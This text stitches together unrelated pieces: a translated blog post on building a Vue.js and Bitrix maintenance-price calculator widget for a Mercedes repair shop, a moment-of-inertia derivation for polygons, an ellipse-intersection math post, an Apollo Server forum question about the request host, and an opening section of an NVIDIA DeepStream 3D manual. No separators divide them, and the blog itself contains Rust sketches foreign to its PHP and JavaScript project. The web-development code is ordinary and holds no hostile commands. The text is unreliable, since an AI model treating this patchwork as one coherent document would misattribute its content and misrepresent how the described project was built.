Blog /
A maintenance-calculator widget for a Mercedes repair shop, built with Vue.js and a Bitrix backend
Author: Mark Mishko
23.07.2019
2941
The task
We need a scheduled-maintenance calculator. The user picks their car's configuration by these parameters:
• Vehicle type (passenger car, SUV, minivan), shown as buttons;
• Model, shown as a list of preview image + name;
• Production year, a dropdown list;
• Body type, a dropdown list;
• Modification, a dropdown list.
Once the selection is made, a mileage scale appears with marks at the maintenance intervals. For cars with petrol engines the step is 15,000 km; for diesels, 10,000 km. There is also a "cap": the maximum mileage up to which maintenance services are offered. It differs between modifications.
Then the user picks their mileage and gets the nearest higher mileage at which maintenance is performed. For example, if I have driven 16,000 km, my service point is 30,000 km. Now we have all the data for the calculation, so we show the price, the list of work performed, and a "Book now" button; clicking it opens a modal with a form. The information goes into a Bitrix infoblock and out by email. The repair shop gets a lead and is very happy. The client is happy anyway: he drives a Mercedes :)
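A small illustrative sketch of that rounding rule (the helper and its names are hypothetical, not from the project's code):

/// Round a mileage up to the next service interval, capped at the maximum
/// mileage for which the shop offers maintenance.
fn next_service_km(mileage: u32, step: u32, max: u32) -> Option<u32> {
    // ceil(mileage / step) * step, but never below one full interval
    let next = ((mileage + step - 1) / step).max(1) * step;
    if next > max { None } else { Some(next) }
}

fn main() {
    // Petrol engine: 15,000 km intervals; assume a 150,000 km cap.
    assert_eq!(next_service_km(16_000, 15_000, 150_000), Some(30_000));
    assert_eq!(next_service_km(0, 15_000, 150_000), Some(15_000));
    // Past the cap, no service interval is offered.
    assert_eq!(next_service_km(151_000, 15_000, 150_000), None);
}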
We need all this beauty as a widget that can be dropped into any spot on any site with three lines of code, because besides the "Maintenance" section of the main site we want to use it on a landing page built around this particular service.
The admin panel must allow configuring the field labels, the message shown after a successful submission, and the main color.
Deadline: 2 working days.
So how do we build it? Implementation
A widget, then. With a configurable color. And labels. And all of it manageable from the admin panel. OK, let's go:
Backend: we write a Bitrix module that scrapes the zillion models, modifications and prices from the official dealers (the parser is a separate story). All the data lives in infoblocks, eight of them in total:
1. Vehicle type,
2. Model,
3. Production year,
4. Body type,
5. Modification,
6. Prices,
7. Works,
8. Requests.
We don't want to live with the official prices as-is; we need a way to manage them. Obviously, editing 6,500+ prices by hand is not just slow, it's hopeless. We solve this by assigning coefficients to models and body types, as the sketch below illustrates.
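The idea in one line (an illustrative sketch with hypothetical names; the real logic lives in the Vue computed property shown later):

// Sketch: adjust an official price by per-model and per-body-type
// coefficients instead of hand-editing 6,500+ price records.
fn adjusted_price(official: f64, k_model: f64, k_bodytype: f64) -> f64 {
    official * k_model * k_bodytype
}

fn main() {
    // e.g. a 10% markup for the model and a 5% discount for the body type
    let p = adjusted_price(10_000.0, 1.10, 0.95);
    assert!((p - 10_450.0).abs() < 1e-9);
}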
To talk to the front end, we write a small PHP class implementing the API.
Good, the backend is sorted. What about the front end? Since this is a widget, only two files should need to be included: a JS script and a stylesheet. We love Vue.js, and it loves us back :) But we want to work with full-fledged components in .vue files, use Sass, test in an isolated environment, and still get a two-file bundle as output. The excellent vue-cli and the wonderful webpack come to the rescue.
The widget's file and directory structure
Here it is:
/widget/api/ - the API directory.
/widget/api/api.php - the entry point for API requests.
/widget/api/mmbApi.php - the class implementing the API.
/widget/mmb/ - the front end; the widget itself.
/widget/mmb/dist/ - the production build goes here.
/widget/mmb/public/ - files for the dev build.
/widget/mmb/src/ - the sources.
/widget/mmb/src/components/Calc.vue - the widget's Vue component.
/widget/mmb/src/App.vue - the Vue application.
/widget/mmb/src/main.js - the bootstrap file.
/widget/mmb/vue.config.js - the configuration file.
A small, understandable structure. Let's start with the back end:
Back end: the calculator API
The api.php file, which the widget talks to, is quite small.
We include the Bitrix prolog, the API class, and the Bitrix catalog and iblock modules:
<? require($_SERVER["DOCUMENT_ROOT"] . "/bitrix/modules/main/include/prolog_before.php");
include "mmbApi.php";
CModule::IncludeModule("catalog");
CModule::IncludeModule("iblock");
Then we clear the output buffer, initialize the result array, and read the task from the request:
global $APPLICATION;
$APPLICATION->RestartBuffer();
$result = [];
$task = !empty($_REQUEST['task']) ? $_REQUEST['task'] : '';
And then we handle the tasks:
switch ($task) {
case 'get-data':
$api = new mmbApi();
$result = $api->getData();
break;
case 'get-sass-vars':
$api = new mmbApi();
$result = $api->getData();
$color = !empty($result['options']['field_main_color']) ? $result['options']['field_main_color'] : '#00ADEF';
$colorNoHex = str_replace('#', '', $color);
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
header('Content-Type: text/css');
print_r("
.mmb-main-color-static,
#mmbApp .mmbc .mmb-price-price .mmb-price-value,
#mmbApp .mmbc .mmb-select-css:focus,
.mmb-main-color-static div {
color: $color !important;
}
#mmbApp .mmbc .mmb-modal__body,
#mmbApp .mmbc .mmb-reply {
border-color: $color !important;
}
.mmb-main-color-back-static,
#mmbApp .mmbc .mmb-works__text .service__item:after,
#mmbApp .mmbc .mmb-spinner > div,
.vue-slider-process,
#mmbApp .mmbc .mmb-btn {
background-color: $color !important;
}
.mmb-main-color-hover:hover,
.mmb-main-color-hover:hover div {
color: $color !important;
}
.mmb-main-color-back-hover:hover {
background-color: $color !important;
}
#mmbApp .mmbc .mmb-select-css,
#mmbApp .mmbc .mmb-works .mmb-title span:after {
background-image: url('data:image/svg+xml;charset=US-ASCII,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20width%3D%22292.4%22%20height%3D%22292.4%22%3E%3Cpath%20fill%3D%22%23$colorNoHex%22%20d%3D%22M287%2069.4a17.6%2017.6%200%200%200-13-5.4H18.4c-5%200-9.3%201.8-12.9%205.4A17.6%2017.6%200%200%200%200%2082.2c0%205%201.8%209.3%205.4%2012.9l128%20127.9c3.6%203.6%207.8%205.4%2012.8%205.4s9.2-1.8%2012.8-5.4L287%2095c3.5-3.5%205.4-7.8%205.4-12.8%200-5-1.9-9.2-5.5-12.8z%22%2F%3E%3C%2Fsvg%3E') !important;
}
");
exit;
break;
}
There are two of them:
• get-data returns the data for building the widget's interface;
• get-sass-vars returns a hard-coded chunk of styles responsible for the look of the interface, essentially implementing the color scheme. As we remember, it is driven by the main color set in the Bitrix module settings.
On to our class, or rather its getData method:
public function getData()
{
$return = [];
// vehicle types
$return += $this->cartypes();
// models
$return += $this->models();
// production years
$return += $this->years();
// body types
$return += $this->bodytypes();
// modifications
$return += $this->modifications();
// current modification
$return += $this->modification();
// request submission
$return += $this->callback();
// settings
$return += $this->options();
// request
$return += $this->request();
return $return;
}
Simple and obvious: we collect data for each entity and return the resulting array. The data-fetching methods are all alike, so let's look at modifications as an example:
public function modifications()
{
$return = [];
if ($this->request['bodytype'] > 0) {
$modifications = $this->getElements([
'IBLOCK_ID' => self::IBLOCK_ID_MODIFICATION,
'PROPERTY_' . self::PROPERTY_CODE_CARTYPE_IN_MODEL => $this->request['cartype'],
'PROPERTY_' . self::PROPERTY_CODE_YEAR_IN_MODIFICATION => $this->request['year'],
'PROPERTY_' . self::PROPERTY_CODE_BODYTYPE_IN_MODIFICATION => $this->request['bodytype'],
], 100, [
'ID', 'IBLOCK_ID', 'PROPERTY_STEP', 'PROPERTY_MAX', 'NAME'
], ['SORT' => 'ASC'], false);
foreach ($modifications as $modification) {
$return[] = array(
'id' => $modification['fields']['ID'],
'name' => $modification['fields']['NAME'],
'step' => $modification['fields']['PROPERTY_STEP_VALUE'],
'max' => $modification['fields']['PROPERTY_MAX_VALUE'],
);
}
}
return ['modifications' => $return];
}
We can only fetch modifications once we know the vehicle type, production year and body type. We use the helper method getElements(), a wrapper around CIBlockElement::GetList that returns an array of elements.
The callback() function sends a request to an infoblock and out by email:
public function callback()
{
$result = [];
if (!empty($this->request['callback'])) {
$PROP = [
'phone' => htmlspecialchars($this->request['callback_phone']),
'email' => htmlspecialchars($this->request['callback_email']),
];
$text = $this->request['callback_model'] . "\n";
$text .= $this->request['callback_year'] . "\n";
$text .= $this->request['callback_bodytype'] . "\n";
$text .= $this->request['callback_modification'] . "\n";
$text .= $this->request['callback_service'] . "\n";
$text .= $this->request['callback_price'] . "\n\n";
$text .= htmlspecialchars($this->request['callback_text']);
$itemToDb = [
"IBLOCK_SECTION_ID" => false,
"IBLOCK_ID" => self::IBLOCK_ID_CALLBACKS,
"NAME" => htmlspecialchars($this->request['callback_name']),
"PREVIEW_TEXT" => $text,
"ACTIVE" => "N",
"PROPERTY_VALUES" => $PROP
];
$el = new CIBlockElement;
$ID = $el->Add($itemToDb);
$el->SetPropertyValuesEx($ID, self::IBLOCK_ID_CALLBACKS, $PROP);
$elem = self::getElements(['IBLOCK_ID' => self::IBLOCK_ID_CALLBACKS, 'ID' => $ID]);
$elem = array_values($elem)[0];
// compose the message
$mName = $elem['fields']['NAME'];
$mText = $elem['fields']['~PREVIEW_TEXT'];
$mPhone = $elem['props']['phone']['VALUE'];
$mEmail = $elem['props']['email']['VALUE'];
// email the order to the admin
$emailFields = [
'mName' => $mName,
'mText' => $mText,
'mPhone' => $mPhone,
'mEmail' => $mEmail,
];
CEvent::Send('APP_CALC_MESSAGE', SITE_ID, $emailFields);
$result = ['reply' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_thx")];
$this->request['callback'] = 0;
}
return $result;
}
…and we only do all of this if the request came from the calculator. The marker: the presence of request['callback'].
The module settings hold the labels for headings, subheadings and buttons. We pass them along via the options() method:
public function options()
{
return [
'options' => [
'field_h_main' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_main"),
'field_h_auto' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_auto"),
'field_h_params' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_params"),
'field_h_works' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_works"),
'field_h_mileage' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_mileage"),
'field_h_mileage2' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_mileage2"),
'field_h_service' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_service"),
'field_h_price' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_price"),
'field_h_text' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_text"),
'field_h_name' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_name"),
'field_h_adds' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_adds"),
'field_h_thx' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_h_thx"),
'field_main_color' => \Bitrix\Main\Config\Option::get("morepages.mastermb", "field_main_color"),
]
];
}
Front End.
We create a project with vue-cli:
vue create mmb
Go into the new project and run
npm run build
then look at the dist/js directory. It now contains several files like:
app.95c13c5a.js
chunk-vendors.2ce01813.js
So we've only just initialized a new application, and there are already two files. As the app grows, there will be more. On top of that, every build produces different file names. Now, what if the widget's embed code is already installed in several places across several sites? We are not going to keep updating the embed code everywhere it lives. So: we want a single .js file with a static name, and the same for the .css file. How do we achieve that?
We add the following instructions to vue.config.js:
const webpack = require('webpack')
let assetsDir = "assets";
module.exports = {
assetsDir: assetsDir,
configureWebpack: {
output: {
filename: assetsDir + "/[name].js",
chunkFilename: assetsDir + "/[name].js"
},
plugins: [
new webpack.optimize.LimitChunkCountPlugin({
maxChunks: 1
})
]
},
chainWebpack:
config => {
config.optimization.delete('splitChunks')
if (config.plugins.has("extract-css")) {
const extractCSSPlugin = config.plugin("extract-css");
extractCSSPlugin &&
extractCSSPlugin.tap(() => [
{
filename: assetsDir + "/[name].css",
chunkFilename: assetsDir + "/[name].css"
}
]);
}
}
}
Wonderful. Now every build puts two files into /dist/assets/:
app.css
app.js
Now to the component itself. The widget is small, so we decided to keep it as a single component rather than splitting it into smaller ones. We create the Calc.vue file, where all the action happens.
In the <template> section we start building the component with the main heading. Remember, the heading text is stored in the admin panel and served by our API.
<div class="mmb-title mmb-title_big">
<span v-if="info && info.options">{{info.options.field_h_main}}</span>
</div>
The v-if directive checks whether the data has arrived from the API; if it has, we render it. We do the same with every text setting that comes from the admin panel.
Next come the functional blocks. First, the vehicle type selection:
<div v-if="info && info.cartypes" class="mmb-cartypes">
<div v-for="cartype in info.cartypes" :key="cartype.id" class="mmb-cartype mmb-main-color-back-hover"
@click="handleCartypeChecked(cartype.id)"
:class="{'active mmb-main-color-back-static': (info.request.cartype == cartype.id)}">
{{cartype.name}}
</div>
</div>
We loop over the types and render buttons. On the click event we attach a handler that refreshes the data from the API. The handler's code lives in the <script> section, in the component's methods option:
handleCartypeChecked(cartypeId) {
this.info.request.cartype = cartypeId;
this.info.request.model = 0;
this.info.request.year = 0;
this.info.request.bodytype = 0;
this.info.request.modification = 0;
this.getData(this.info.request);
},
Here we put the selected vehicle type into request and reset the model, year, body type and modification selections to zero if they had already been chosen. Then we call the API via getData(). This function is the single "gateway" through which all communication with the API happens. Here is what it looks like:
getData(params, scrollToElement) {
params = params || {};
scrollToElement = scrollToElement || '';
let that = this;
document.getElementById('mmb-spinner').classList.add("show");
axios
.get('https://mastermb.ru/widget/api/api.php?task=get-data', {params: params})
.then(response => (this.info = response.data))
.then(function () {
if (scrollToElement != '') {
that.resetScrollPos(scrollToElement);
}
document.getElementById('mmb-spinner').classList.remove("show");
});
}
The method takes two parameters:
1. params - the request parameters;
2. scrollToElement - the selector of the element the browser window should scroll to after the data arrives from the API.
The flow is as follows:
1. "Stash" this into that, so the component object can be used inside callbacks;
2. Show the loading indicator;
3. Make the request to the API;
4. Update the data;
5. If we need to scroll to an element, do so with the dedicated method that.resetScrollPos;
6. Hide the loading indicator.
Next come the blocks for selecting the model, production year, body type and modification:
<div v-if="info && info.models" class="mmb-models">
<div v-for="model in info.models" :key="model.id" class="mmb-model mmb-main-color-hover"
@click="handleModelChecked(model.id)"
:class="{'active mmb-main-color-static': (info.request.model == model.id)}">
<div class="mmb-model__preview">
<img :src="model.preview"/>
</div>
<div class="mmb-model__title">
{{model.name}}
</div>
</div>
</div>
<div v-if="info && info.request.model > 0" class="mmb-params" id="mmb-params">
<div class="mmb-params__params">
<div class="mmb-title mmb-title_w100">
<span v-if="info && info.options">{{info.options.field_h_params}}</span>
</div>
<div v-if="info && info.years && info.years.length" class="mmb-years">
<select v-model="info.request.year" @change="handleYearChecked($event)" class="mmb-select-css">
<option value="0">--= год ==-</option>
<option v-for="year in info.years" :key="year.id" :value="year.id">
{{year.name}}
</option>
</select>
</div>
<div v-if="info && info.bodytypes && info.bodytypes.length" class="mmb-bodytypes">
<select v-model="info.request.bodytype" @change="handleBodytypeChecked($event)"
class="mmb-select-css">
<option value="0">--= тип кузова ==-</option>
<option v-for="bodytype in info.bodytypes" :key="bodytype.id" :value="bodytype.id">
{{bodytype.name}}
</option>
</select>
</div>
<div v-if="info && info.modifications && info.modifications.length" class="mmb-modifications">
<select v-model="info.request.modification" @change="handleModificationChecked($event)"
class="mmb-select-css">
<option value="0">--= модификация ==-</option>
<option v-for="modification in info.modifications" :key="modification.id"
:value="modification.id">
{{modification.name}}
</option>
</select>
</div>
</div>
<div class="mmb-params__preview">
<div v-if="info && info.request.modification > 0">
<div class="mmb-model__preview">
<img :src="info.modification.preview"/>
</div>
</div>
<div v-if="info && info.request.modification == 0">
<div v-for="model in info.models" :key="model.id">
<div class="mmb-model__preview" v-if="info.request.model == model.id">
<img :src="model.preview"/>
</div>
</div>
</div>
</div>
</div>
Models are rendered as teasers: image + name. Year, body type and modification are selects. As soon as the last select is chosen, we can move on to showing the price and picking the mileage.
<div v-if="info && info.modification.length != 0">
<div class="mmb-works" :class="{'mmb-togglable-closed': worksClosed, 'mmb-togglable-opened': !worksClosed}">
<div class="mmb-title" @click="handleWorksToggle()">
<span v-if="info && info.options">{{info.options.field_h_works}}</span>
</div>
<div class="mmb-works__text">
<div class="mmb-works__text__inner" v-html="serviceWorks"></div>
</div>
</div>
<div class="mmb-title">
<span v-if="info && info.options">{{info.options.field_h_mileage}}</span>
</div>
<div class="mmb-mileage">
<vue-slider
v-model="sliderValue"
:marks="sliderData"
:contained="true"
:min="0"
:max="parseInt(info.modification.max)"
:interval="1000"
:railStyle="{height: '10px', 'border-radius': 0}"
></vue-slider>
</div>
<div class="mmb-price-box">
<div class="mmb-price-mileage">
<div class="mmb-price-header">
<span v-if="info && info.options">{{info.options.field_h_mileage2}}</span>
</div>
<div class="mmb-price-value">{{ formatNumber(sliderValue) }} км</div>
</div>
<div class="mmb-price-service">
<div class="mmb-price-header">
<span v-if="info && info.options">{{info.options.field_h_service}}</span>
</div>
<div class="mmb-price-value">{{ formatNumber(serviceVal) }} км</div>
</div>
<div class="mmb-price-price">
<div class="mmb-price-header">
<span v-if="info && info.options">{{info.options.field_h_price}}</span>
</div>
<div class="mmb-price-value">{{ servicePrice }} *</div>
</div>
<div>
<button class="mmb-btn" @click="modalShow()">Записаться</button>
</div>
</div>
<div class="mmb-annotation mmb-text-gray">
<span v-if="info && info.options">{{info.options.field_h_text}}</span>
</div>
...
</div>
A slider is a convenient way to pick the mileage, so we use <vue-slider>. The current price is a computed property, defined in the computed block:
servicePrice: function () {
var price = 0;
if (this.info && this.info.modification.length != 0) {
let currentService = this.serviceVal;
this.info.prices.forEach(function (element) {
if (parseInt(element.mileage) == currentService) {
price = element.price;
}
});
}
price *= parseFloat(this.currentModel.k);
price *= parseFloat(this.currentBodytype.k);
if (price == 0) {
price = 'По запросу';
} else {
price = this.formatNumber(price) + ' ₽';
}
return price;
}
We keep the option of showing the price "on request": entering zero in the admin panel triggers it.
And then there's the usual lead form in a modal.
The widget embed code
To embed the widget we use this code:
<div id="mmbApp"></div>
<script>
(function (w, d, u, u2) {
var s = d.createElement('script');
s.async = true;
s.src = u + '?' + (Date.now() / 60000 | 0);
var h = d.getElementsByTagName('script')[0];
h.parentNode.insertBefore(s, h);
var s2 = d.createElement('link');
s2.href = u2 + '?' + (Date.now() / 60000 | 0);
s2.rel = 'stylesheet';
s2.type = 'text/css';
var h2 = d.getElementsByTagName('link')[0];
h2.parentNode.insertBefore(s2, h2);
})(window, document, 'https://mastermb.ru/widget/mmb/dist/assets/app.js', 'https://mastermb.ru/widget/mmb/dist/assets/app.css');
</script>
Why not just use plain <script> and <link> tags? It's all about caching. With static .js and .css URLs, we can't guarantee that changes to the widget take effect immediately: the files will be cached on the client. The "old" widget code would end up working with the "new" API code. Fine if the API hasn't changed; otherwise, things get ugly :)
This snippet creates those same <script> and <link> tags, but with JavaScript. Why? To append a time-based value to the file URLs: (Date.now() / 60000 | 0) is the number of minutes since the Unix epoch, so the URL changes once a minute and the widget always stays fresh.
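The same cache-busting value, restated as a sketch (illustrative only):

use std::time::{SystemTime, UNIX_EPOCH};

// Integer minutes since the Unix epoch, mirroring the JS expression
// (Date.now() / 60000 | 0): the query string changes at most once a minute.
fn cache_buster() -> u64 {
    let ms = SystemTime::now()
        .duration_since(UNIX_EPOCH)
        .expect("system clock before 1970")
        .as_millis() as u64;
    ms / 60_000
}

fn main() {
    println!("app.js?{}", cache_buster());
}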
The live project where you can see the widget: mastermb.ru
That's all! Like, share, and recommend us to your friends!
Questions? Write to us!
Calculating the Moment of Inertia of a Polygon
The moment of inertia is computed as the integral of the density times the squared distance from the axis of rotation:

$$ I = \int_V \vec r_{\perp}^{\,2}\, \rho(\vec r)\, \mathrm{d}V $$

We consider a flat region with constant areal density $1$. The formula then simplifies to:

$$ I = \int_A \vec r_{\perp}^{\,2}\, \mathrm{d}A $$
As a subproblem we consider a trapezoid, one of whose sides lies on the x-axis and whose two other sides are parallel to the y-axis. The trapezoid is determined by the two points $(x_1, y_1)$ and $(x_2, y_2)$:
··+ y₂
······ |
····· |
····· |
····· |
y₁ +·· |
| |
| |
| |
| |
| |
0 -+-------------------------+-
x₁ x₂
The trapezoid is described by:

$$ f(x) = y_1 + (x - x_1)\,\frac{y_2 - y_1}{x_2 - x_1} $$

With $\Delta x := x_2 - x_1$, $\Delta y := y_2 - y_1$ and $s := \Delta y / \Delta x$ this becomes:

$$ f(x) = y_1 + s\,(x - x_1) $$
The moment of inertia of this region is:

$$ I_i = \int_{x_1}^{x_2} \int_{0}^{f(x)} y^2 \,\mathrm{d}y \,\mathrm{d}x $$
$$ I_i = \int_{x_1}^{x_2} \tfrac{1}{3}\left[y^3\right]_{0}^{f(x)} \mathrm{d}x $$
$$ I_i = \tfrac{1}{3} \int_{x_1}^{x_2} f(x)^3 \,\mathrm{d}x $$

We substitute $x \to x + x_1$:

$$ I_i = \tfrac{1}{3} \int_{0}^{x_2 - x_1} f(x + x_1)^3 \,\mathrm{d}x $$
$$ I_i = \tfrac{1}{3} \int_{0}^{\Delta x} (y_1 + s x)^3 \,\mathrm{d}x $$
$$ I_i = \tfrac{1}{3} \int_{0}^{\Delta x} \left( y_1^3 + 3 y_1^2 s x + 3 y_1 s^2 x^2 + s^3 x^3 \right) \mathrm{d}x $$
$$ I_i = \tfrac{1}{3} \left[ \int_{0}^{\Delta x} y_1^3 \,\mathrm{d}x + \int_{0}^{\Delta x} 3 y_1^2 s x \,\mathrm{d}x + \int_{0}^{\Delta x} 3 y_1 s^2 x^2 \,\mathrm{d}x + \int_{0}^{\Delta x} s^3 x^3 \,\mathrm{d}x \right] $$
$$ I_i = \tfrac{1}{3} \left[ y_1^3\,\Delta x + \tfrac{3}{2}\, y_1^2 s\,\Delta x^2 + y_1 s^2\,\Delta x^3 + \tfrac{1}{4}\, s^3\,\Delta x^4 \right] $$
$$ I_i = \tfrac{1}{12}\,\Delta x \left[ 4 y_1^3 + 6 y_1^2 s\,\Delta x + 4 y_1 s^2\,\Delta x^2 + s^3\,\Delta x^3 \right] $$
$$ I_i = \tfrac{1}{12}\,\Delta x \left[ 4 y_1^3 + 6 y_1^2\,\Delta y + 4 y_1\,\Delta y^2 + \Delta y^3 \right] $$
$$ I_i = \tfrac{1}{12}\,\Delta x \left[ 4 y_1^3 + 6 y_1^2 (y_2 - y_1) + 4 y_1 (y_2 - y_1)^2 + (y_2 - y_1)^3 \right] $$
$$ I_i = \tfrac{1}{12}\,\Delta x \left[ 4 y_1^3 + 6 y_2 y_1^2 - 6 y_1^3 + 4 y_2^2 y_1 - 8 y_2 y_1^2 + 4 y_1^3 + y_2^3 - 3 y_2^2 y_1 + 3 y_2 y_1^2 - y_1^3 \right] $$
$$ I_i = \tfrac{1}{12}\,\Delta x \left( y_2^3 + y_2^2 y_1 + y_2 y_1^2 + y_1^3 \right) $$
$$ I_i = \tfrac{1}{12}\,\Delta x \left( y_2^2 + y_1^2 \right)\left( y_2 + y_1 \right) $$
We flip the sign of $\Delta x$ so that a polygon with positive area (traversed counter-clockwise) also gets a positive moment of inertia:

$$ I_i = \tfrac{1}{12}\,(x_1 - x_2)\left( y_2^2 + y_1^2 \right)\left( y_2 + y_1 \right) $$

and sum over all sub-regions (with $y_n := y_0$, $x_n := x_0$):

$$ I = \sum_{i=0}^{n-1} I_i = \frac{1}{12} \sum_{i=0}^{n-1} (x_i - x_{i+1})\left( y_{i+1}^2 + y_i^2 \right)\left( y_{i+1} + y_i \right) \qquad \square $$

Because the indices are cyclic, $\sum_{i=0}^{n-1} g(x_i, y_i) = \sum_{i=0}^{n-1} g(x_{i+1}, y_{i+1})$ for every $g$, so this can also be written as:

$$ I = \sum_{i=0}^{n-1} I_i = \frac{1}{12} \sum_{i=0}^{n-1} (x_i y_{i+1} - x_{i+1} y_i)\left( y_{i+1}^2 + y_{i+1} y_i + y_i^2 \right) \qquad \square $$
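As a quick sanity check (this example is not from the original article), apply the first sum to the unit square with counter-clockwise vertices $(0,0), (1,0), (1,1), (0,1)$. Only the top edge from $(1,1)$ to $(0,1)$ has both a nonzero $x_i - x_{i+1}$ and nonzero $y$ values, so

$$ I = \frac{1}{12}\,(1 - 0)\left(1^2 + 1^2\right)(1 + 1) = \frac{4}{12} = \frac{1}{3}, $$

which matches the direct integral $\int_0^1 \int_0^1 y^2 \,\mathrm{d}y\,\mathrm{d}x = \tfrac{1}{3}$.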
See where two ellipses intersect in C#, Part 2
This post shows The Ugly Math that you can use to see where two ellipses intersect. Brace yourself! Here it comes!
First recall the quadratic formula. If ax² + bx + c = 0, then:

x = ( -b ± √(b² - 4ac) ) / 2a

Now consider the formula for a conic section:

Ax² + Bxy + Cy² + Dx + Ey + F = 0

You can rewrite this to group the terms by powers of y, like this:

Cy² + (Bx + E)y + (Ax² + Dx + F) = 0

Plugging the terms a = C, b = Bx + E, c = Ax² + Dx + F into the quadratic formula gives the following equation, which we'll call G1(x):

y = ( -(Bx + E) ± √( (Bx + E)² - 4C(Ax² + Dx + F) ) ) / 2C
(Starting to get messy, isn’t it?)
Notice that the equation contains a square root that can be positive or negative. Let G1+(x) be the version of the equation with the positive root and let G1-(x) be the version with the negative root.
Now consider a second conic section, defined by a second set of coefficients:

A2x² + B2xy + C2y² + D2x + E2y + F2 = 0

Solving it for y in the same way gives the corresponding equation for this conic section. Again define two equations, G2+(x) and G2-(x), to represent the versions with the positive and negative square roots.
The two curves intersect where they have the same x and y values. In other words, those points have x coordinates where G1(x) = G2(x), or G1(x) - G2(x) = 0.
Considering all four combinations of positive and negative roots in the equations gives these four equations:
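With the branch notation above, the four combinations are:

(1) G1+(x) - G2+(x) = 0
(2) G1+(x) - G2-(x) = 0
(3) G1-(x) - G2+(x) = 0
(4) G1-(x) - G2-(x) = 0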
If you solve these four equations for x, you'll find 0, 1, 2, or 4 points of intersection for the ellipses.
Note that some of the equations may contain square roots of negative numbers and in those cases they don’t have real solutions.
Note also that one of the equations might have more than one root. For example, in the picture on the right, the bottom of the red ellipse overlaps the top of the blue ellipse. If the red ellipse is ellipse number 1, then the bottom of the red ellipse is generated by its negative-root equation G1-(x), and the top of the blue ellipse by the positive-root equation G2+(x). That means both points of intersection are generated by the equation G1-(x) - G2+(x) = 0.
Unfortunately, the four equations that define the points of intersection are really messy, and I don't know of a closed-form solution to them. But all is not lost! You can use Newton's method to find an approximation for the values of x that solve the equation.
To use Newton's method to find the roots (zeros) of an equation, you need to find the derivative of that equation. The derivative of the difference of two functions is the difference of the derivatives, so, for example, the derivative of equation (1) is G1+'(x) - G2+'(x).
Now you can use equations (1) through (4) and their derivatives to apply Newton’s method and look for roots.
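For reference, the core Newton iteration is tiny. Here is a generic sketch of it (Rust used for illustration; this is not the post's C# code):

// Find x with f(x) = 0 given the derivative df. Returns None on failure.
fn newton(f: impl Fn(f64) -> f64, df: impl Fn(f64) -> f64, mut x: f64) -> Option<f64> {
    for _ in 0..100 {
        let fx = f(x);
        if fx.abs() < 1e-12 {
            return Some(x);
        }
        let d = df(x);
        if d.abs() < f64::EPSILON {
            return None; // derivative too flat to make progress
        }
        x -= fx / d;
    }
    None
}

fn main() {
    // Example: a root of x^2 - 2 starting near 1.0 converges to sqrt(2).
    let r = newton(|x| x * x - 2.0, |x| 2.0 * x, 1.0).unwrap();
    assert!((r - 2f64.sqrt()).abs() < 1e-9);
}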
Simple, isn't it? Well… not really. See the post Use Newton's method to find the roots of equations in C# for information about Newton's method.
In the next post, I’ll summarize this method for finding intersections between conic sections and explain what the program shown in the picture at the top of this post actually does.
The host in ApolloServer context is not real
The host entered by the user cannot be obtained in the context of ApolloServer
It is possible in WebApp.connectHandlers.use. How can I get the same value in the context of ApolloServer?
Here is my code. Reading the host in the ApolloServer context gives localhost:4000:
const server = new ApolloServer({
schema,
context: async ctx => {
console.log('Apollo server context: ', ctx.req.headers.host);
//Apollo server context: localhost:4000
},
});
server.applyMiddleware({
app: WebApp.connectHandlers,
path: '/graphql',
});
WebApp.connectHandlers.use('/graphql', (req, res) => {
if (req.method === 'GET') {
res.end();
}
});
The host obtained in WebApp.connectHandlers.use is the hostname that was actually entered, such as hello.com:
WebApp.connectHandlers.use((req, res, next) => {
if (req.headers && req.headers.host) {
console.log('WebApp connectHandlers: ', req.headers.host);
//WebApp connectHandlers: hello.com
}
return next();
});
What do I have to do to get hello.com in the ApolloServer context? Please help me, thank you.
The origin and referer cannot be retrieved from the ApolloServer context either. Is there any way?
I asked this question in apollographql/apollo-server issue #4887.
DeepStream 3D Custom Manual
A new ds3d framework, with interfaces and custom libs, is defined for DS 3D processing. These interfaces are capable of different types of data fusion and support different types of custom libraries for dataloader, datafilter and datarender. The interface has ABI-compatible layers and modern C++ interface layers; you only need to focus on the modern interface for application or custom-lib development.
The DeepStream 3D dataloader is loaded by GstAppSrc. It can be used with depth cameras (such as stereo or Time-of-Flight cameras) to capture image/depth data, or to load 2D/3D data from a source file. It can also capture data from a lidar sensor or a lidar data file. datafilter is loaded by the nvds3dfilter Gst-plugin. It can be used for 2D depth data processing, 3D point-cloud extraction from depth, other 2D-depth or 3D-points data filters, and lidar or 3D data inference. datarender is loaded by GstAppSink. It can be used for 2D depth rendering, 3D point-cloud and lidar data rendering, or dumping data to file.
DS3D Application Examples
• deepstream-lidar-inference has sample code that loads these custom libs and connects the components in simple ways. Besides that, DS3D provides simple C++ safe pointers for GStreamer components. The interfaces can be found in the header files located at /opt/nvidia/deepstream/deepstream/sources/libs/ds3d/gst/.
The image below shows the overview of lidar 3D data inference and rendering pipeline in deepstream-lidar-inference.
DeepStream Lidar point cloud inference and rendering overview
See more details in the DeepStream Lidar Inference App (Alpha).
• deepstream-3d-depth-camera is another example of a ds3d pipeline.
The image below shows the overview of depth to 3D point processing pipeline in deepstream-3d-depth-camera.
DeepStream Depth Camera for 3D point cloud processing overview
See more details in the DeepStream 3D Depth Camera App.
All the components are configured in YAML format and are loaded by Gst-plugins. There are 3 major components, and they may all be loaded into the DeepStream pipeline.
ds3d::dataloader - Load Custom Lib for Data Capture
Load and Manage Dataloader
Examples:
name: realsense_dataloader
type: ds3d::dataloader
out_caps: ds3d/datamap
custom_lib_path: libnvds_3d_dataloader_realsense.so
